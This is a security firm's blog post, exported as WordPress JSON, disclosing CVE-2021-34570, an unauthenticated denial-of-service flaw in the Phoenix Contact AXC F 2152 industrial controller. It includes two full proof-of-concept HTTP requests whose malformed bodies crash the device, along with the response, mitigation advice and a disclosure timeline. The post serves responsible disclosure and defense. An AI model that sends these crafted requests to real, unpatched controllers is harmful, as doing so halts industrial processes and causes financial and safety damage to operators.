{"id":6882,"date":"2021-09-23T10:47:04","date_gmt":"2021-09-23T09:47:04","guid":{"rendered":"https:\/\/www.dionach.com\/?p=6882"},"modified":"2024-03-18T15:49:32","modified_gmt":"2024-03-18T15:49:32","slug":"phoenix-contact-axc-f-2152-denial-of-service-vulnerability","status":"publish","type":"post","link":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/","title":{"rendered":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"6882\" class=\"elementor elementor-6882\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-47707530 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"47707530\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2fbb05fb\" data-id=\"2fbb05fb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-11ee7253 elementor-widget elementor-widget-text-editor\" data-id=\"11ee7253\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong style=\"font-size: 17px; color: var( --e-global-color-text ); font-family: var( --e-global-typography-text-font-family ), Sans-serif;\">Author:<\/strong><span style=\"font-size: 17px; color: var( --e-global-color-text ); font-family: var( --e-global-typography-text-font-family ), Sans-serif; font-weight: var( --e-global-typography-text-font-weight );\"> Oliver Carrigan \u2013 OT Security Consultant<\/span><\/p><h2>Introduction<\/h2><p><span style=\"font-size: medium;\">The Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh industrial environments to control industrial processes such as manufacturing lines and building management systems. The controller was seen to be vulnerable to a restart vulnerability (CVE-2021-34570) which would allow an unauthenticated attacker with network access to the device to create a denial-of-service condition, impacting the availability of the device.<\/span><\/p><h2>Vulnerability<\/h2><p><span style=\"font-size: medium;\">The controller runs a Linux based operating system on top of which lies a REST-based API web service used to interact with the web-based HMI. The HMI is used to provide a graphical representation of the current process under control. In order to view the web-based HMI, the controller implements a 3-stage authentication process using Oauth to authenticate the user and ensure they are authorised to access the web-based HMI. An attacker could abuse the \/_pxc_api\/v1.2\/auth\/access-token endpoint used in the authentication process which would force the controller to restart due to a segmentation fault within the controller. This is achieved by crafting a malformed JSON request to the endpoint.<\/span><\/p><div><span style=\"font-size: medium;\">Using a web interception proxy, and modifying the following request:<\/span><\/div><div>\u00a0<\/div><div><span style=\"font-size: medium;\">POST \/_pxc_api\/v1.2\/auth\/access-token<\/span><\/div><pre>Host: &lt;IP&gt;\nConnection: close\nContent-Length: 129\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.82 Safari\/537.36\nContent-Type: text\/plain; charset=UTF-8\nAccept: *\/*\nOrigin: https:\/\/&lt;IP&gt;\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https:\/\/&lt;IP&gt;\/ehmi\/hmiapp.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{\"code\":\"be3fcb3c2bdeff54\",\"grant_type\":\"authorization_code\",\"username\":\"*********\",\"password\":\"********\",\"state\":\"30a847a460c6a1f6\"}<\/pre><div>\u00a0<\/div><p><span style=\"font-size: medium;\">The following POCs were used to launch the attack:<\/span><\/p><p><span style=\"font-size: medium;\">POST \/_pxc_api\/v1.2\/auth\/access-token<\/span><\/p><pre>Host: &lt;IP&gt;\nConnection: close\nContent-Length: 3\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.82 Safari\/537.36\nContent-Type: text\/plain; charset=UTF-8\nAccept: *\/*\nOrigin: https:\/\/&lt;IP&gt;\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https:\/\/&lt;IP&gt;\/ehmi\/hmiapp.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n<strong>{<\/strong>\n<strong>A<\/strong>\n<strong>}<\/strong><\/pre><p><span style=\"font-size: medium;\">POST \/_pxc_api\/v1.2\/auth\/access-token<\/span><\/p><pre>Host: &lt;IP&gt;\nConnection: close\nContent-Length: 234\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.82 Safari\/537.36\nContent-Type: text\/plain; charset=UTF-8\nAccept: *\/*\nOrigin: https:\/\/&lt;IP&gt;\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https:\/\/&lt;IP&gt;\/ehmi\/hmiapp.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n<strong>&lt;?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?&gt;\n&lt;root&gt;\n     &lt;password&gt;********&lt;\/password&gt;\n     &lt;code&gt;db0d04e21dbc0ede&lt;\/code&gt;\n     &lt;grant_type\/&gt;\n     &lt;state&gt;4cf70d2058cb2b62&lt;\/state&gt;\n     &lt;username&gt;*********&lt;\/username&gt;\n&lt;\/root&gt;<\/strong><\/pre><p><span style=\"font-size: medium;\">Both POCs result in the controller returning the following response and the controller stops responding to ICMP requests.<\/span> <!-- a padding to disable MSIE and Chrome friendly error page --><\/p><pre>HTTP\/1.1 502 Bad Gateway\nServer: nginx\nDate:\nContent-Type: text\/html\nContent-Length: 552\nConnection: close\n\n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;502 Bad Gateway&lt;\/title&gt;&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;&lt;h1&gt;502 Bad Gateway&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;\n&lt;!-- a padding to disable MSIE and Chrome friendly error page --&gt;<\/pre><h2>Proof of Concept Video<\/h2><div style=\"width: 1200px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-6882-1\" width=\"1200\" height=\"675\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/www.dionach.com\/wp-content\/uploads\/2021\/09\/Phoenix_Contact_Restart_POC.mp4?_=1\" \/><a href=\"https:\/\/www.dionach.com\/wp-content\/uploads\/2021\/09\/Phoenix_Contact_Restart_POC.mp4\">https:\/\/www.dionach.com\/wp-content\/uploads\/2021\/09\/Phoenix_Contact_Restart_POC.mp4<\/a><\/video><\/div><h2>Likelihood<\/h2><p><span style=\"font-size: medium;\">Whilst \/_pxc_api\/v1.2\/auth\/access-token endpoint is accessible without any authentication an attacker would require access to a closed network, typically protected by a suitable firewall, the controller is on to perform this attack.<\/span><\/p><h2>Impact<\/h2><p><span style=\"font-size: medium;\">The AXC F 2125 controller is predominantly found within manufacturing facilities and an attacker that successfully exploits this vulnerability would be able to stop the manufacturing process resulting in financial loss and reputational harm. An attacker could script this exploit in order to cause a lasting impact on the production output.<\/span><\/p><h2>\u00a0<\/h2><h2>Mitigation<\/h2><div><span style=\"font-size: medium;\">Phoenix Contact have released an advisory for this vulnerability which can be found HERE and are advising that all customers update their devices&#8217; firmware to at least 2021.0.5 LTS or higher. Additionally, operators should ensure that controllers are contained within a closed network with suitable protection such as a firewall.<\/span><\/div><div>\u00a0<\/div><div><span style=\"font-size: medium;\">Dionach would like to thank Phoenix Contact for responding to the responsible disclosure in a timely manner and for working with Dionach to mitigate this vulnerability.<\/span><\/div><h2>\u00a0<\/h2><h2>Timeline<\/h2><div><span style=\"font-size: medium;\">17th May 2021 | Details of the vulnerability has been emailed to the vendor at psirt@phoenixcontact.com.<\/span><\/div><div><span style=\"font-size: medium;\">17th May 2021 | Response from the vendor acknowledging the vulnerability<\/span><\/div><div><span style=\"font-size: medium;\">2nd June 2021 | Vendor confirms that the vulnerability was not able to be reproduced on firmware version 2021.0.5 LTS and asked Dionach to confirm also.<\/span><\/div><div><span style=\"font-size: medium;\">25th June 2021 | Dionach confirmed the vulnerability is no longer present on the firmware version 2021.0.5 LTS.<\/span><\/div><div><span style=\"font-size: medium;\">25th June 2021 | CVE number allocated and Dionach worked with the vendor on a publication date of this vulnerability.<\/span><\/div><div><span style=\"font-size: medium;\">4th August 2021 | Advisory was issued on the vendors.<\/span><\/div><div>\u00a0<\/div><div>\u00a0<\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Author: Oliver Carrigan \u2013 OT Security Consultant Introduction The Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh industrial environments to control industrial processes such as manufacturing lines and building management systems. The controller was seen to be vulnerable to a restart vulnerability (CVE-2021-34570) which would allow an unauthenticated attacker [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":8085,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-6882","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-researchblog","wpbf-post"],"contentshake_article_id":"","yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Phoenix Contact AXC F 2152 Denial of Service Vulnerability<\/title>\n<meta name=\"description\" content=\"Author: Oliver Carrigan \u2013 OT Security ConsultantIntroductionThe Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Phoenix Contact AXC F 2152 Denial of Service Vulnerability\" \/>\n<meta property=\"og:description\" content=\"Author: Oliver Carrigan \u2013 OT Security ConsultantIntroductionThe Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\" \/>\n<meta property=\"og:site_name\" content=\"Dionach\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dionachcyber\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-23T09:47:04+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-18T15:49:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"747\" \/>\n\t<meta property=\"og:image:height\" content=\"542\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Craig Fisher\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:site\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Craig Fisher\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\"},\"author\":{\"name\":\"Craig Fisher\",\"@id\":\"https:\/\/dionach.com\/en-us\/#\/schema\/person\/02dcce775ed751b1abcc7184318577e6\"},\"headline\":\"Phoenix Contact AXC F 2152 Denial of Service Vulnerability\",\"datePublished\":\"2021-09-23T09:47:04+00:00\",\"dateModified\":\"2024-03-18T15:49:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\"},\"wordCount\":520,\"publisher\":{\"@id\":\"https:\/\/dionach.com\/en-us\/#organization\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1\",\"articleSection\":[\"researchblog\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\",\"url\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\",\"name\":\"Phoenix Contact AXC F 2152 Denial of Service Vulnerability\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/en-us\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1\",\"datePublished\":\"2021-09-23T09:47:04+00:00\",\"dateModified\":\"2024-03-18T15:49:32+00:00\",\"description\":\"Author: Oliver Carrigan \u2013 OT Security ConsultantIntroductionThe Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh\",\"breadcrumb\":{\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1\",\"width\":747,\"height\":542},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/dionach.com\/en-us\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Phoenix Contact AXC F 2152 Denial of Service Vulnerability\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/dionach.com\/en-us\/#website\",\"url\":\"https:\/\/dionach.com\/en-us\/\",\"name\":\"Dionach\",\"description\":\"Real Security in a Virtual World\",\"publisher\":{\"@id\":\"https:\/\/dionach.com\/en-us\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/dionach.com\/en-us\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/dionach.com\/en-us\/#organization\",\"name\":\"Dionach\",\"url\":\"https:\/\/dionach.com\/en-us\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/dionach.com\/en-us\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"contentUrl\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"width\":512,\"height\":512,\"caption\":\"Dionach\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/en-us\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/dionachcyber\",\"https:\/\/x.com\/dionachcyber\",\"https:\/\/uk.linkedin.com\/company\/dionach-ltd\",\"https:\/\/www.instagram.com\/dionachcyber\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/dionach.com\/en-us\/#\/schema\/person\/02dcce775ed751b1abcc7184318577e6\",\"name\":\"Craig Fisher\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/6695dd87b6fefc3e71e476af87dc8238988a246a8ecace1d0e17f68127ca7717?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6695dd87b6fefc3e71e476af87dc8238988a246a8ecace1d0e17f68127ca7717?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6695dd87b6fefc3e71e476af87dc8238988a246a8ecace1d0e17f68127ca7717?s=96&d=mm&r=g\",\"caption\":\"Craig Fisher\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability","description":"Author: Oliver Carrigan \u2013 OT Security ConsultantIntroductionThe Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/","og_locale":"en_US","og_type":"article","og_title":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability","og_description":"Author: Oliver Carrigan \u2013 OT Security ConsultantIntroductionThe Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh","og_url":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/","og_site_name":"Dionach","article_publisher":"https:\/\/www.facebook.com\/dionachcyber","article_published_time":"2021-09-23T09:47:04+00:00","article_modified_time":"2024-03-18T15:49:32+00:00","og_image":[{"width":747,"height":542,"url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1","type":"image\/jpeg"}],"author":"Craig Fisher","twitter_card":"summary_large_image","twitter_creator":"@dionachcyber","twitter_site":"@dionachcyber","twitter_misc":{"Written by":"Craig Fisher","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#article","isPartOf":{"@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/"},"author":{"name":"Craig Fisher","@id":"https:\/\/dionach.com\/en-us\/#\/schema\/person\/02dcce775ed751b1abcc7184318577e6"},"headline":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability","datePublished":"2021-09-23T09:47:04+00:00","dateModified":"2024-03-18T15:49:32+00:00","mainEntityOfPage":{"@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/"},"wordCount":520,"publisher":{"@id":"https:\/\/dionach.com\/en-us\/#organization"},"image":{"@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1","articleSection":["researchblog"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/","url":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/","name":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability","isPartOf":{"@id":"https:\/\/dionach.com\/en-us\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage"},"image":{"@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1","datePublished":"2021-09-23T09:47:04+00:00","dateModified":"2024-03-18T15:49:32+00:00","description":"Author: Oliver Carrigan \u2013 OT Security ConsultantIntroductionThe Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh","breadcrumb":{"@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#primaryimage","url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1","contentUrl":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1","width":747,"height":542},{"@type":"BreadcrumbList","@id":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/dionach.com\/en-us\/"},{"@type":"ListItem","position":2,"name":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability"}]},{"@type":"WebSite","@id":"https:\/\/dionach.com\/en-us\/#website","url":"https:\/\/dionach.com\/en-us\/","name":"Dionach","description":"Real Security in a Virtual World","publisher":{"@id":"https:\/\/dionach.com\/en-us\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dionach.com\/en-us\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/dionach.com\/en-us\/#organization","name":"Dionach","url":"https:\/\/dionach.com\/en-us\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/dionach.com\/en-us\/#\/schema\/logo\/image\/","url":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","contentUrl":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","width":512,"height":512,"caption":"Dionach"},"image":{"@id":"https:\/\/dionach.com\/en-us\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dionachcyber","https:\/\/x.com\/dionachcyber","https:\/\/uk.linkedin.com\/company\/dionach-ltd","https:\/\/www.instagram.com\/dionachcyber\/"]},{"@type":"Person","@id":"https:\/\/dionach.com\/en-us\/#\/schema\/person\/02dcce775ed751b1abcc7184318577e6","name":"Craig Fisher","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/6695dd87b6fefc3e71e476af87dc8238988a246a8ecace1d0e17f68127ca7717?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/6695dd87b6fefc3e71e476af87dc8238988a246a8ecace1d0e17f68127ca7717?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6695dd87b6fefc3e71e476af87dc8238988a246a8ecace1d0e17f68127ca7717?s=96&d=mm&r=g","caption":"Craig Fisher"}}]}},"jetpack_featured_media_url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2022\/09\/pexels-pixabay-267350-scaled-1-e1666109344829.jpeg?fit=747%2C542&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/ph4Ojq-1N0","_links":{"self":[{"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/posts\/6882","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/comments?post=6882"}],"version-history":[{"count":0,"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/posts\/6882\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/media\/8085"}],"wp:attachment":[{"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/media?parent=6882"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/categories?post=6882"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dionach.com\/en-us\/wp-json\/wp\/v2\/tags?post=6882"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}